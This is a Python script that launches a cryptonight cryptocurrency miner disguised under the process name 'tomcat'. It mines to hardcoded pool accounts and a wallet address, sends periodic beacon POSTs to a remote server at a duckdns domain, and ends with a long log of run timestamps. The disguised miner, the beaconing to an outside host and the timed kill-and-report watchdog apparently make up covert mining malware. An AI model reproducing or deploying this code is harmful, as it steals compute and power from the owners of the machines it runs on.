import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:35:07.542991
#2018-02-17 17:23:05.483528
#2018-02-17 19:12:01.273616
#2018-02-17 20:59:06.711808
#2018-02-17 22:45:06.512741
#2018-02-18 00:27:01.943778
#2018-02-18 02:18:06.320527
#2018-02-18 04:06:01.786595
#2018-02-18 05:55:06.299831
#2018-02-18 07:47:05.156657
#2018-02-18 09:35:06.074536
#2018-02-18 11:21:04.239947
#2018-02-18 13:07:06.758985
#2018-02-18 14:57:01.278801
#2018-02-18 16:46:01.241924
#2018-02-18 18:34:06.588804
#2018-02-18 20:22:05.544481
#2018-02-18 22:08:04.576309
#2018-02-18 23:55:05.960653
#2018-02-19 01:41:07.545490
#2018-02-19 03:29:07.855114
#2018-02-19 05:15:01.965908
#2018-02-19 07:03:01.580829
#2018-02-19 08:52:05.426048
#2018-02-19 10:41:05.864703
#2018-02-19 12:28:01.409913
#2018-02-19 14:14:07.871731
#2018-02-19 16:03:02.156313
#2018-02-19 17:51:07.710044
#2018-02-19 19:39:06.864678
#2018-02-19 21:26:06.634699
#2018-02-19 23:11:07.449837
#2018-02-20 00:56:04.369521
#2018-02-20 02:46:06.504905
#2018-02-20 04:33:06.304661
#2018-02-20 06:16:08.714312
#2018-02-20 08:01:04.156683
#2018-02-20 09:47:05.907822
#2018-02-20 11:31:07.479818
#2018-02-20 13:16:08.036447
#2018-02-20 15:01:01.594753
#2018-02-20 16:45:01.510615
#2018-02-20 18:33:09.300582
#2018-02-20 20:23:04.544257
#2018-02-20 22:08:08.018649
#2018-02-20 23:50:08.391775
#2018-02-21 01:36:05.846165
#2018-02-21 03:24:06.843632
#2018-02-21 05:13:03.799868
#2018-02-21 07:01:04.015264
#2018-02-21 08:46:07.775792
#2018-02-21 10:34:04.554712
#2018-02-21 12:22:08.587986
#2018-02-21 14:10:06.623082
#2018-02-21 15:55:09.604036
#2018-02-21 17:47:08.265594
#2018-02-21 19:32:06.248581
#2018-02-21 21:20:09.588691
#2018-02-21 23:07:04.906202
#2018-02-22 00:57:01.615595
#2018-02-22 02:44:05.463552
#2018-02-22 04:31:07.243538
#2018-02-22 06:16:05.817811
#2018-02-22 08:02:07.649204
#2018-02-22 09:51:06.734415
#2018-02-22 11:35:10.389507
#2018-02-22 13:23:09.273767
#2018-02-22 15:13:05.345494
#2018-02-22 16:58:09.512829
#2018-02-22 18:46:07.402214
#2018-02-22 20:39:04.220068
#2018-02-22 22:24:01.931602
#2018-02-23 00:10:06.996770
#2018-02-23 01:59:01.436670
#2018-02-23 03:44:01.851903
#2018-02-23 05:32:07.060374
#2018-02-23 07:16:07.478967
#2018-02-23 09:21:08.105190
#2018-02-23 11:27:06.161104
#2018-02-23 13:18:05.057077
#2018-02-23 15:03:06.876548
#2018-02-23 16:52:01.396589
#2018-02-23 18:40:01.342274
#2018-02-23 20:26:08.285594
#2018-02-23 22:13:04.359424
#2018-02-23 23:59:07.347723
#2018-02-24 01:50:06.212804
#2018-02-24 03:43:03.897755
#2018-02-24 05:32:06.554819
#2018-02-24 07:18:05.528451
#2018-02-24 09:08:07.233964
#2018-02-24 10:43:03.563949
#2018-02-24 12:26:07.775393
#2018-02-24 14:03:07.585614
#2018-02-24 15:39:03.712750
#2018-02-24 17:18:06.046516
#2018-02-24 18:50:09.755873
#2018-02-24 20:23:04.080460
#2018-02-24 21:51:01.714018
#2018-02-25 01:56:06.214890
#2018-02-25 05:45:09.718067
#2018-02-25 11:37:04.489787